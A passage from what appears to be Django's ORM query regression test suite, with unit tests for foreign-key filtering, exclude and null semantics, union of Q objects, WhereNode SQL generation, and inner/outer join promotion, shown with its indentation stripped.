apple = Food.objects.create(name="apple")
lunch = Eaten.objects.create(food=apple, meal="lunch")
dinner = Eaten.objects.create(food=apple, meal="dinner")
self.assertEqual(
set(Eaten.objects.filter(food=apple)),
{lunch, dinner}
)
def test_single_object_reverse(self):
apple = Food.objects.create(name="apple")
lunch = Eaten.objects.create(food=apple, meal="lunch")
self.assertEqual(
set(Food.objects.filter(eaten=lunch)),
{apple}
)
def test_recursive_fk(self):
node1 = Node.objects.create(num=42)
node2 = Node.objects.create(num=1, parent=node1)
self.assertEqual(
list(Node.objects.filter(parent=node1)),
[node2]
)
def test_recursive_fk_reverse(self):
node1 = Node.objects.create(num=42)
node2 = Node.objects.create(num=1, parent=node1)
self.assertEqual(
list(Node.objects.filter(node=node2)),
[node1]
)
class ConditionalTests(BaseQuerysetTest):
"""Tests whose execution depend on different environment conditions like
Python version or DB backend features"""
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
t1 = Tag.objects.create(name='t1', category=generic)
Tag.objects.create(name='t2', parent=t1, category=generic)
t3 = Tag.objects.create(name='t3', parent=t1)
Tag.objects.create(name='t4', parent=t3)
Tag.objects.create(name='t5', parent=t3)
def test_infinite_loop(self):
# If you're not careful, it's possible to introduce infinite loops via
# default ordering on foreign keys in a cycle. We detect that.
self.assertRaisesMessage(
FieldError,
'Infinite loop caused by ordering.',
lambda: list(LoopX.objects.all()) # Force queryset evaluation with list()
)
self.assertRaisesMessage(
FieldError,
'Infinite loop caused by ordering.',
lambda: list(LoopZ.objects.all()) # Force queryset evaluation with list()
)
# Note that this doesn't cause an infinite loop, since the default
# ordering on the Tag model is empty (and thus defaults to using "id"
# for the related field).
self.assertEqual(len(Tag.objects.order_by('parent')), 5)
# ... but you can still order in a non-recursive fashion among linked
# fields (the previous test failed because the default ordering was
# recursive).
self.assertQuerysetEqual(
LoopX.objects.all().order_by('y__x__y__x__id'),
[]
)
# When grouping without specifying ordering, we add an explicit "ORDER BY NULL"
# portion in MySQL to prevent unnecessary sorting.
@skipUnlessDBFeature('requires_explicit_null_ordering_when_grouping')
def test_null_ordering_added(self):
query = Tag.objects.values_list('parent_id', flat=True).order_by().query
query.group_by = ['parent_id']
sql = query.get_compiler(DEFAULT_DB_ALIAS).as_sql()[0]
fragment = "ORDER BY "
pos = sql.find(fragment)
self.assertEqual(sql.find(fragment, pos + 1), -1)
self.assertEqual(sql.find("NULL", pos + len(fragment)), pos + len(fragment))
# Sqlite 3 does not support passing in more than 1000 parameters except by
# changing a parameter at compilation time.
@skipUnlessDBFeature('supports_1000_query_parameters')
def test_ticket14244(self):
# Test that the "in" lookup works with lists of 1000 items or more.
# The numbers amount is picked to force three different IN batches
# for Oracle, yet to be less than 2100 parameter limit for MSSQL.
numbers = list(range(2050))
Number.objects.all().delete()
Number.objects.bulk_create(Number(num=num) for num in numbers)
self.assertEqual(
Number.objects.filter(num__in=numbers[:1000]).count(),
1000
)
self.assertEqual(
Number.objects.filter(num__in=numbers[:1001]).count(),
1001
)
self.assertEqual(
Number.objects.filter(num__in=numbers[:2000]).count(),
2000
)
self.assertEqual(
Number.objects.filter(num__in=numbers).count(),
len(numbers)
)
class UnionTests(unittest.TestCase):
"""
Tests for the union of two querysets. Bug #12252.
"""
@classmethod
def setUpTestData(cls):
objectas = []
objectbs = []
objectcs = []
a_info = ['one', 'two', 'three']
for name in a_info:
o = ObjectA(name=name)
o.save()
objectas.append(o)
b_info = [('un', 1, objectas[0]), ('deux', 2, objectas[0]), ('trois', 3, objectas[2])]
for name, number, objecta in b_info:
o = ObjectB(name=name, num=number, objecta=objecta)
o.save()
objectbs.append(o)
c_info = [('ein', objectas[2], objectbs[2]), ('zwei', objectas[1], objectbs[1])]
for name, objecta, objectb in c_info:
o = ObjectC(name=name, objecta=objecta, objectb=objectb)
o.save()
objectcs.append(o)
def check_union(self, model, Q1, Q2):
filter = model.objects.filter
self.assertEqual(set(filter(Q1) | filter(Q2)), set(filter(Q1 | Q2)))
self.assertEqual(set(filter(Q2) | filter(Q1)), set(filter(Q1 | Q2)))
def test_A_AB(self):
Q1 = Q(name='two')
Q2 = Q(objectb__name='deux')
self.check_union(ObjectA, Q1, Q2)
def test_A_AB2(self):
Q1 = Q(name='two')
Q2 = Q(objectb__name='deux', objectb__num=2)
self.check_union(ObjectA, Q1, Q2)
def test_AB_ACB(self):
Q1 = Q(objectb__name='deux')
Q2 = Q(objectc__objectb__name='deux')
self.check_union(ObjectA, Q1, Q2)
def test_BAB_BAC(self):
Q1 = Q(objecta__objectb__name='deux')
Q2 = Q(objecta__objectc__name='ein')
self.check_union(ObjectB, Q1, Q2)
def test_BAB_BACB(self):
Q1 = Q(objecta__objectb__name='deux')
Q2 = Q(objecta__objectc__objectb__name='trois')
self.check_union(ObjectB, Q1, Q2)
def test_BA_BCA__BAB_BAC_BCA(self):
Q1 = Q(objecta__name='one', objectc__objecta__name='two')
Q2 = Q(objecta__objectc__name='ein', objectc__objecta__name='three', objecta__objectb__name='trois')
self.check_union(ObjectB, Q1, Q2)
class DefaultValuesInsertTest(TestCase):
def test_no_extra_params(self):
# Ticket #17056 -- affects Oracle
try:
DumbCategory.objects.create()
except TypeError:
self.fail("Creation of an instance of a model with only the PK field shouldn't error out after bulk insert refactoring (#17056)")
class ExcludeTests(TestCase):
@classmethod
def setUpTestData(cls):
f1 = Food.objects.create(name='apples')
Food.objects.create(name='oranges')
Eaten.objects.create(food=f1, meal='dinner')
j1 = Job.objects.create(name='Manager')
r1 = Responsibility.objects.create(description='Playing golf')
j2 = Job.objects.create(name='Programmer')
r2 = Responsibility.objects.create(description='Programming')
JobResponsibilities.objects.create(job=j1, responsibility=r1)
JobResponsibilities.objects.create(job=j2, responsibility=r2)
def test_to_field(self):
self.assertQuerysetEqual(
Food.objects.exclude(eaten__meal='dinner'),
['<Food: oranges>'])
self.assertQuerysetEqual(
Job.objects.exclude(responsibilities__description='Playing golf'),
['<Job: Programmer>'])
self.assertQuerysetEqual(
Responsibility.objects.exclude(jobs__name='Manager'),
['<Responsibility: Programming>'])
def test_ticket14511(self):
alex = Person.objects.get_or_create(name='Alex')[0]
jane = Person.objects.get_or_create(name='Jane')[0]
oracle = Company.objects.get_or_create(name='Oracle')[0]
google = Company.objects.get_or_create(name='Google')[0]
microsoft = Company.objects.get_or_create(name='Microsoft')[0]
intel = Company.objects.get_or_create(name='Intel')[0]
def employ(employer, employee, title):
Employment.objects.get_or_create(employee=employee, employer=employer, title=title)
employ(oracle, alex, 'Engineer')
employ(oracle, alex, 'Developer')
employ(google, alex, 'Engineer')
employ(google, alex, 'Manager')
employ(microsoft, alex, 'Manager')
employ(intel, alex, 'Manager')
employ(microsoft, jane, 'Developer')
employ(intel, jane, 'Manager')
alex_tech_employers = alex.employers.filter(
employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
self.assertQuerysetEqual(alex_tech_employers, [google, oracle], lambda x: x)
alex_nontech_employers = alex.employers.exclude(
employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
self.assertQuerysetEqual(alex_nontech_employers, [google, intel, microsoft], lambda x: x)
class ExcludeTest17600(TestCase):
"""
Some regressiontests for ticket #17600. Some of these likely duplicate
other existing tests.
"""
@classmethod
def setUpTestData(cls):
# Create a few Orders.
cls.o1 = Order.objects.create(pk=1)
cls.o2 = Order.objects.create(pk=2)
cls.o3 = Order.objects.create(pk=3)
# Create some OrderItems for the first order with homogeneous
# status_id values
cls.oi1 = OrderItem.objects.create(order=cls.o1, status=1)
cls.oi2 = OrderItem.objects.create(order=cls.o1, status=1)
cls.oi3 = OrderItem.objects.create(order=cls.o1, status=1)
# Create some OrderItems for the second order with heterogeneous
# status_id values
cls.oi4 = OrderItem.objects.create(order=cls.o2, status=1)
cls.oi5 = OrderItem.objects.create(order=cls.o2, status=2)
cls.oi6 = OrderItem.objects.create(order=cls.o2, status=3)
# Create some OrderItems for the second order with heterogeneous
# status_id values
cls.oi7 = OrderItem.objects.create(order=cls.o3, status=2)
cls.oi8 = OrderItem.objects.create(order=cls.o3, status=3)
cls.oi9 = OrderItem.objects.create(order=cls.o3, status=4)
def test_exclude_plain(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertQuerysetEqual(
Order.objects.exclude(items__status=1),
['<Order: 3>'])
def test_exclude_plain_distinct(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertQuerysetEqual(
Order.objects.exclude(items__status=1).distinct(),
['<Order: 3>'])
def test_exclude_with_q_object_distinct(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertQuerysetEqual(
Order.objects.exclude(Q(items__status=1)).distinct(),
['<Order: 3>'])
def test_exclude_with_q_object_no_distinct(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertQuerysetEqual(
Order.objects.exclude(Q(items__status=1)),
['<Order: 3>'])
def test_exclude_with_q_is_equal_to_plain_exclude(self):
"""
Using exclude(condition) and exclude(Q(condition)) should
yield the same QuerySet
"""
self.assertEqual(
list(Order.objects.exclude(items__status=1).distinct()),
list(Order.objects.exclude(Q(items__status=1)).distinct()))
def test_exclude_with_q_is_equal_to_plain_exclude_variation(self):
"""
Using exclude(condition) and exclude(Q(condition)) should
yield the same QuerySet
"""
self.assertEqual(
list(Order.objects.exclude(items__status=1)),
list(Order.objects.exclude(Q(items__status=1)).distinct()))
@unittest.expectedFailure
def test_only_orders_with_all_items_having_status_1(self):
"""
This should only return orders having ALL items set to status 1, or
those items not having any orders at all. The correct way to write
this query in SQL seems to be using two nested subqueries.
"""
self.assertQuerysetEqual(
Order.objects.exclude(~Q(items__status=1)).distinct(),
['<Order: 1>'])
class Exclude15786(TestCase):
"""Regression test for #15786"""
def test_ticket15786(self):
c1 = SimpleCategory.objects.create(name='c1')
c2 = SimpleCategory.objects.create(name='c2')
OneToOneCategory.objects.create(category=c1)
OneToOneCategory.objects.create(category=c2)
rel = CategoryRelationship.objects.create(first=c1, second=c2)
self.assertEqual(
CategoryRelationship.objects.exclude(
first__onetoonecategory=F('second__onetoonecategory')
).get(), rel
)
class NullInExcludeTest(TestCase):
@classmethod
def setUpTestData(cls):
NullableName.objects.create(name='i1')
NullableName.objects.create()
def test_null_in_exclude_qs(self):
none_val = '' if connection.features.interprets_empty_strings_as_nulls else None
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=[]),
['i1', none_val], attrgetter('name'))
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=['i1']),
[none_val], attrgetter('name'))
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=['i3']),
['i1', none_val], attrgetter('name'))
inner_qs = NullableName.objects.filter(name='i1').values_list('name')
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=inner_qs),
[none_val], attrgetter('name'))
# Check that the inner queryset wasn't executed - it should be turned
# into subquery above
self.assertIs(inner_qs._result_cache, None)
@unittest.expectedFailure
def test_col_not_in_list_containing_null(self):
"""
The following case is not handled properly because
SQL's COL NOT IN (list containing null) handling is too weird to
abstract away.
"""
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=[None]),
['i1'], attrgetter('name'))
def test_double_exclude(self):
self.assertEqual(
list(NullableName.objects.filter(~~Q(name='i1'))),
list(NullableName.objects.filter(Q(name='i1'))))
self.assertNotIn(
'IS NOT NULL',
str(NullableName.objects.filter(~~Q(name='i1')).query))
class EmptyStringsAsNullTest(TestCase):
"""
Test that filtering on non-null character fields works as expected.
The reason for these tests is that Oracle treats '' as NULL, and this
can cause problems in query construction. Refs #17957.
"""
@classmethod
def setUpTestData(cls):
cls.nc = NamedCategory.objects.create(name='')
def test_direct_exclude(self):
self.assertQuerysetEqual(
NamedCategory.objects.exclude(name__in=['nonexisting']),
[self.nc.pk], attrgetter('pk')
)
def test_joined_exclude(self):
self.assertQuerysetEqual(
DumbCategory.objects.exclude(namedcategory__name__in=['nonexisting']),
[self.nc.pk], attrgetter('pk')
)
def test_21001(self):
foo = NamedCategory.objects.create(name='foo')
self.assertQuerysetEqual(
NamedCategory.objects.exclude(name=''),
[foo.pk], attrgetter('pk')
)
class ProxyQueryCleanupTest(TestCase):
def test_evaluated_proxy_count(self):
"""
Test that generating the query string doesn't alter the query's state
in irreversible ways. Refs #18248.
"""
ProxyCategory.objects.create()
qs = ProxyCategory.objects.all()
self.assertEqual(qs.count(), 1)
str(qs.query)
self.assertEqual(qs.count(), 1)
class WhereNodeTest(TestCase):
class DummyNode(object):
def as_sql(self, compiler, connection):
return 'dummy', []
class MockCompiler(object):
def compile(self, node):
return node.as_sql(self, connection)
def __call__(self, name):
return connection.ops.quote_name(name)
def test_empty_full_handling_conjunction(self):
compiler = WhereNodeTest.MockCompiler()
w = WhereNode(children=[NothingNode()])
self.assertRaises(EmptyResultSet, w.as_sql, compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[self.DummyNode(), self.DummyNode()])
self.assertEqual(w.as_sql(compiler, connection), ('(dummy AND dummy)', []))
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy AND dummy)', []))
w = WhereNode(children=[NothingNode(), self.DummyNode()])
self.assertRaises(EmptyResultSet, w.as_sql, compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
def test_empty_full_handling_disjunction(self):
compiler = WhereNodeTest.MockCompiler()
w = WhereNode(children=[NothingNode()], connector='OR')
self.assertRaises(EmptyResultSet, w.as_sql, compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[self.DummyNode(), self.DummyNode()], connector='OR')
self.assertEqual(w.as_sql(compiler, connection), ('(dummy OR dummy)', []))
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy OR dummy)', []))
w = WhereNode(children=[NothingNode(), self.DummyNode()], connector='OR')
self.assertEqual(w.as_sql(compiler, connection), ('dummy', []))
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy)', []))
def test_empty_nodes(self):
compiler = WhereNodeTest.MockCompiler()
empty_w = WhereNode()
w = WhereNode(children=[empty_w, empty_w])
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w.negate()
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.connector = 'OR'
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[empty_w, NothingNode()], connector='OR')
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[empty_w, NothingNode()], connector='AND')
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
class IteratorExceptionsTest(TestCase):
def test_iter_exceptions(self):
qs = ExtraInfo.objects.only('author')
with self.assertRaises(AttributeError):
list(qs)
def test_invalid_qs_list(self):
# Test for #19895 - second iteration over invalid queryset
# raises errors.
qs = Article.objects.order_by('invalid_column')
self.assertRaises(FieldError, list, qs)
self.assertRaises(FieldError, list, qs)
class NullJoinPromotionOrTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.d1 = ModelD.objects.create(name='foo')
d2 = ModelD.objects.create(name='bar')
cls.a1 = ModelA.objects.create(name='a1', d=cls.d1)
c = ModelC.objects.create(name='c')
b = ModelB.objects.create(name='b', c=c)
cls.a2 = ModelA.objects.create(name='a2', b=b, d=d2)
def test_ticket_17886(self):
# The first Q-object is generating the match, the rest of the filters
# should not remove the match even if they do not match anything. The
# problem here was that b__name generates a LOUTER JOIN, then
# b__c__name generates join to c, which the ORM tried to promote but
# failed as that join isn't nullable.
q_obj = (
Q(d__name='foo') |
Q(b__name='foo') |
Q(b__c__name='foo')
)
qset = ModelA.objects.filter(q_obj)
self.assertEqual(list(qset), [self.a1])
# We generate one INNER JOIN to D. The join is direct and not nullable
# so we can use INNER JOIN for it. However, we can NOT use INNER JOIN
# for the b->c join, as a->b is nullable.
self.assertEqual(str(qset.query).count('INNER JOIN'), 1)
def test_isnull_filter_promotion(self):
qs = ModelA.objects.filter(Q(b__name__isnull=True))
self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
self.assertEqual(list(qs), [self.a1])
qs = ModelA.objects.filter(~Q(b__name__isnull=True))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(list(qs), [self.a2])
qs = ModelA.objects.filter(~~Q(b__name__isnull=True))
self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
self.assertEqual(list(qs), [self.a1])
qs = ModelA.objects.filter(Q(b__name__isnull=False))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(list(qs), [self.a2])
qs = ModelA.objects.filter(~Q(b__name__isnull=False))
self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
self.assertEqual(list(qs), [self.a1])
qs = ModelA.objects.filter(~~Q(b__name__isnull=False))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(list(qs), [self.a2])
def test_null_join_demotion(self):
qs = ModelA.objects.filter(Q(b__name__isnull=False) & Q(b__name__isnull=True))
self.assertIn(' INNER JOIN ', str(qs.query))
qs = ModelA.objects.filter(Q(b__name__isnull=True) & Q(b__name__isnull=False))
self.assertIn(' INNER JOIN ', str(qs.query))
qs = ModelA.objects.filter(Q(b__name__isnull=False) | Q(b__name__isnull=True))
self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
qs = ModelA.objects.filter(Q(b__name__isnull=True) | Q(b__name__isnull=False))
self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
def test_ticket_21366(self):
n = Note.objects.create(note='n', misc='m')
e = ExtraInfo.objects.create(info='info', note=n)
a = Author.objects.create(name='Author1', num=1, extra=e)
Ranking.objects.create(rank=1, author=a)
r1 = Report.objects.create(name='Foo', creator=a)
r2 = Report.objects.create(name='Bar')
Report.objects.create(name='Bar', creator=a)
qs = Report.objects.filter(
Q(creator__ranking__isnull=True) |
Q(creator__ranking__rank=1, name='Foo')
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count(' JOIN '), 2)
self.assertQuerysetEqual(
qs.order_by('name'), [r2, r1], lambda x: x)
def test_ticket_21748(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
i3 = Identifier.objects.create(name='i3')
Program.objects.create(identifier=i1)
Channel.objects.create(identifier=i1)
Program.objects.create(identifier=i2)
self.assertQuerysetEqual(
Identifier.objects.filter(program=None, channel=None),
[i3], lambda x: x)
self.assertQuerysetEqual(
Identifier.objects.exclude(program=None, channel=None).order_by('name'),
[i1, i2], lambda x: x)
def test_ticket_21748_double_negated_and(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
Identifier.objects.create(name='i3')
p1 = Program.objects.create(identifier=i1)
c1 = Channel.objects.create(identifier=i1)
Program.objects.create(identifier=i2)
# Check the ~~Q() (or equivalently .exclude(~Q)) works like Q() for
# join promotion.
qs1_doubleneg = Identifier.objects.exclude(~Q(program__id=p1.id, channel__id=c1.id)).order_by('pk')
qs1_filter = Identifier.objects.filter(program__id=p1.id, channel__id=c1.id).order_by('pk')
self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
self.assertEqual(str(qs1_filter.query).count('JOIN'),
str(qs1_doubleneg.query).count('JOIN'))
self.assertEqual(2, str(qs1_doubleneg.query).count('INNER JOIN'))
self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
str(qs1_doubleneg.query).count('INNER JOIN'))
def test_ticket_21748_double_negated_or(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
Identifier.objects.create(name='i3')
p1 = Program.objects.create(identifier=i1)
c1 = Channel.objects.create(identifier=i1)
p2 = Program.objects.create(identifier=i2)
# Test OR + doubleneq. The expected result is that channel is LOUTER
# joined, program INNER joined
qs1_filter = Identifier.objects.filter(
Q(program__id=p2.id, channel__id=c1.id)
| Q(program__id=p1.id)
).order_by('pk')
qs1_doubleneg = Identifier.objects.exclude(
~Q(Q(program__id=p2.id, channel__id=c1.id)
| Q(program__id=p1.id))
).order_by('pk')
self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
self.assertEqual(str(qs1_filter.query).count('JOIN'),
str(qs1_doubleneg.query).count('JOIN'))
self.assertEqual(1, str(qs1_doubleneg.query).count('INNER JOIN'))
self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
str(qs1_doubleneg.query).count('INNER JOIN'))
def test_ticket_21748_complex_filter(self):
i1 = Identifier.objects.create(name='i1')
i2 = Identifier.objects.create(name='i2')
Identifier.objects.create(name='i3')
p1 = Program.objects.create(identifier=i1)
c1 = Channel.objects.create(identifier=i1)
p2 = Program.objects.create(identifier=i2)
# Finally, a more complex case, one time in a way where each
# NOT is pushed to lowest level in the boolean tree, and
# another query where this isn't done.
qs1 = Identifier.objects.filter(
~Q(~Q(program__id=p2.id, channel__id=c1.id)
& Q(program__id=p1.id))).order_by('pk')
qs2 = Identifier.objects.filter(
Q(Q(program__id=p2.id, channel__id=c1.id)
| ~Q(program__id=p1.id))).order_by('pk')
self.assertQuerysetEqual(qs1, qs2, lambda x: x)
self.assertEqual(str(qs1.query).count('JOIN'),
str(qs2.query).count('JOIN'))
self.assertEqual(0, str(qs1.query).count('INNER JOIN'))
self.assertEqual(str(qs1.query).count('INNER JOIN'),
str(qs2.query).count('INNER JOIN'))
class ReverseJoinTrimmingTest(TestCase):
def test_reverse_trimming(self):
# Check that we don't accidentally trim reverse joins - we can't know
# if there is anything on the other side of the join, so trimming
# reverse joins can't be done, ever.
t = Tag.objects.create()
qs = Tag.objects.filter(annotation__tag=t.pk)
self.assertIn('INNER JOIN', str(qs.query))
self.assertEqual(list(qs), [])
class JoinReuseTest(TestCase):
"""
Test that the queries reuse joins sensibly (for example, direct joins
are always reused).
"""
def test_fk_reuse(self):
qs = Annotation.objects.filter(tag__name='foo').filter(tag__name='bar')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_select_related(self):
qs = Annotation.objects.filter(tag__name='foo').select_related('tag')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_annotation(self):
qs = Annotation.objects.filter(tag__name='foo').annotate(cnt=Count('tag__name'))
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_disjunction(self):
qs = Annotation.objects.filter(Q(tag__name='foo') | Q(tag__name='bar'))
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_fk_reuse_order_by(self):
qs = Annotation.objects.filter(tag__name='foo').order_by('tag__name')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_revo2o_reuse(self):
qs = Detail.objects.filter(member__name='foo').filter(member__name='foo')
self.assertEqual(str(qs.query).count('JOIN'), 1)
def test_revfk_noreuse(self):
qs = Author.objects.filter(report__name='r4').filter(report__name='r1')
self.assertEqual(str(qs.query).count('JOIN'), 2)
class DisjunctionPromotionTests(TestCase):
def test_disjuction_promotion_select_related(self):
fk1 = FK1.objects.create(f1='f1', f2='f2')
basea = BaseA.objects.create(a=fk1)
qs = BaseA.objects.filter(Q(a=fk1) | Q(b=2))
self.assertEqual(str(qs.query).count(' JOIN '), 0)
qs = qs.select_related('a', 'b')
self.assertEqual(str(qs.query).count(' INNER JOIN '), 0)
self.assertEqual(str(qs.query).count(' LEFT OUTER JOIN '), 2)
with self.assertNumQueries(1):
self.assertQuerysetEqual(qs, [basea], lambda x: x)
self.assertEqual(qs[0].a, fk1)
self.assertIs(qs[0].b, None)
def test_disjunction_promotion1(self):
# Pre-existing join, add two ORed filters to the same join,
# all joins can be INNER JOINS.
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(Q(b__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
# Reverse the order of AND and OR filters.
qs = BaseA.objects.filter(Q(b__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
def test_disjunction_promotion2(self):
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# Now we have two different joins in an ORed condition, these
# must be OUTER joins. The pre-existing join should remain INNER.
qs = qs.filter(Q(b__f1='foo') | Q(c__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
# Reverse case.
qs = BaseA.objects.filter(Q(b__f1='foo') | Q(c__f2='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
def test_disjunction_promotion3(self):
qs = BaseA.objects.filter(a__f2='bar')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# The ANDed a__f2 filter allows us to use keep using INNER JOIN
# even inside the ORed case. If the join to a__ returns nothing,
# the ANDed filter for a__f2 can't be true.
qs = qs.filter(Q(a__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion3_demote(self):
# This one needs demotion logic: the first filter causes a to be
# outer joined, the second filter makes it inner join again.
qs = BaseA.objects.filter(
Q(a__f1='foo') | Q(b__f2='foo')).filter(a__f2='bar')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion4_demote(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
# Demote needed for the "a" join. It is marked as outer join by
# above filter (even if it is trimmed away).
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion4(self):
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion5_demote(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
# Note that the above filters on a force the join to an
# inner join even if it is trimmed.
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = qs.filter(Q(a__f1='foo') | Q(b__f1='foo'))
# So, now the a__f1 join doesn't need promotion.
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# But b__f1 does.
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
qs = BaseA.objects.filter(Q(a__f1='foo') | Q(b__f1='foo'))
# Now the join to a is created as LOUTER
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion6(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
def test_disjunction_promotion7(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') | (Q(b__f1='foo') & Q(a__f1='bar')))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
qs = BaseA.objects.filter(
(Q(a__f1='foo') | Q(b__f1='foo')) & (Q(a__f1='bar') | Q(c__f1='foo'))
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
qs = BaseA.objects.filter(
(Q(a__f1='foo') | (Q(a__f1='bar')) & (Q(b__f1='bar') | Q(c__f1='foo')))
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion_fexpression(self):
qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(a__f2=F('b__f2')) | Q(c__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | (Q(pk=1) & Q(pk=2)))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
class ManyToManyExcludeTest(TestCase):
def test_exclude_many_to_many(self):
Identifier.objects.create(name='extra')
program = Program.objects.create(identifier=Identifier.objects.create(name='program'))
